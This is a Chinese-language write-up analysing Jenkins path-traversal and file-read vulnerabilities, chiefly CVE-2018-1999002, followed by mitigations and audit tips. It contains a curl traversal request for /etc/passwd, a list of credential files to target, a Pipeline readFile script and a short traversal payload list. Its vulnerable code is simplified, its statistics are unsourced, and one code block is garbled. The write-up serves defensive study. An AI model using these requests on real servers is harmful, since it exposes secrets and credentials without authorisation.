Jenkins任意文件读取漏洞的示例分析

# Jenkins任意文件读取漏洞的示例分析

## 前言

Jenkins作为最流行的开源持续集成工具之一，因其强大的扩展性和易用性被广泛应用于企业级开发环境中。然而，其复杂的功能模块和插件生态也带来了潜在的安全风险。本文将通过CVE编号漏洞实例，深入分析Jenkins任意文件读取漏洞的原理、利用方式及防御措施。

---

## 一、漏洞背景

### 1.1 Jenkins架构特点
Jenkins采用主从架构，核心功能通过插件扩展：
- 基于Java Servlet的Web界面
- Groovy脚本控制台
- 插件动态加载机制
- 工作空间(Workspace)文件系统访问

### 1.2 典型漏洞类型
历史漏洞统计显示：
- 文件操作类漏洞占比32%
- 反序列化漏洞占比28%
- 权限绕过漏洞占比19%
- XSS/CSRF等Web漏洞占比21%

---

## 二、漏洞实例分析（CVE-2018-1999002）

### 2.1 漏洞基本信息
| 项 | 值 |
|----|----|
| CVE编号 | CVE-2018-1999002 |
| 影响版本 | Jenkins < 2.121.1 |
| 漏洞类型 | 路径遍历导致任意文件读取 |
| CVSS评分 | 6.5 (Medium) |

### 2.2 漏洞原理
在`Stapler`框架处理静态资源请求时，未正确校验路径参数：
```java
// 漏洞代码示例
public void doDynamic(StaplerRequest req, StaplerResponse rsp) {
    String path = req.getRestOfPath();
    File file = new File(BASE_DIR, path); // 未做路径规范化
    if(file.exists()) {
        rsp.serveFile(req, file);
    }
}

攻击者可构造如下恶意请求：

http://jenkins-server/plugin/..%2f..%2f..%2fetc/passwd

通过%2f(URL编码的/)实现目录穿越。

2.3 利用过程演示

步骤1：检测漏洞存在

使用curl发送测试请求：

curl -v 'http://target/jenkins/plugin/..%2f..%2f..%2fetc/passwd'

步骤2：构造恶意请求

成功读取时的响应特征：

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

步骤3：敏感信息获取

常见目标文件： - /etc/shadow - $JENKINS_HOME/config.xml - $JENKINS_HOME/credentials.xml

三、其他相关漏洞对比

3.1 CVE-2019-1003000

• 触发点：Pipeline脚本解析
• 利用条件：需具有Script Console权限
• 利用效果：通过readFile方法读取任意文件

// 恶意Pipeline脚本示例
node {
    def content = readFile '/etc/passwd'
    echo content
}

3.2 CVE-2020-2103

• 触发点：用户头像上传功能
• 绕过方式：使用../进行路径穿越
• 限制条件：需认证用户权限

四、漏洞防御方案

4.1 官方修复措施

1. 路径规范化检查

// 修复代码示例
String safePath = Paths.get(BASE_DIR)
                     .resolve(Paths.get(path))
                     .normalize()
                     .toString();
if(!safePath.startsWith(BASE_DIR)) {
    throw new SecurityException("Invalid path");
}

1. 输入过滤机制

• 禁止../序列
• 限制文件扩展名
• 设置访问白名单

4.2 运维防护建议

• 升级策略：

  graph LR
  A[发现漏洞] --> B{是否有补丁?}
  B -->|是| C[立即升级]
  B -->|否| D[启用临时防护措施]
  

• 安全配置：

  # jenkins.xml 安全配置示例
  <arguments>
  -Djenkins.security.ScriptShell.enabled=false
  -Dhudson.model.DirectoryBrowserSupport.CSP="sandbox; default-src 'none'"
  </arguments>
  

4.3 开发注意事项

1. 文件操作API使用规范： “`java // 不安全方式 new File(userInputPath);

// 安全方式 Paths.get(”/safe/base”).resolve(userInput).normalize();

2. 权限最小化原则：
   - 禁用不必要的插件
   - 严格控制Script Console访问

---

## 五、漏洞挖掘方法论

### 5.1 代码审计重点
1. 文件操作相关API调用点：
   - `java.io.File`
   - `java.nio.file.Files`
   - `File.read*`方法族

2. Web请求处理链路：
   - Stapler路由机制
   - REST API端点
   - 插件扩展点

### 5.2 黑盒测试技巧
1. 路径遍历测试Payload：

/../../etc/passwd /..%5c..%5cwindows/win.ini /%2e%2e/%2e%2e/etc/shadow

2. 自动化检测工具：
   - Jenkins Exploit Framework (JEF)
   - Nuclei模板检测

---

## 六、总结与启示

1. 安全启示：
   - 文件操作类漏洞在Java Web应用中高发
   - 插件机制显著扩大攻击面
   - 自动化工具需结合人工审计

2. 未来研究方向：
   - 静态分析工具的规则优化
   - 基于行为的运行时防护
   - 供应链安全检测

---

## 参考资料
1. Jenkins Security Advisory 2018-07-18
2. OWASP Path Traversal Cheatsheet
3. CWE-22: Improper Limitation of a Pathname

注：本文示例代码仅用于安全研究，实际测试需获得系统所有者授权。建议通过Jenkins官方镜像搭建测试环境进行验证。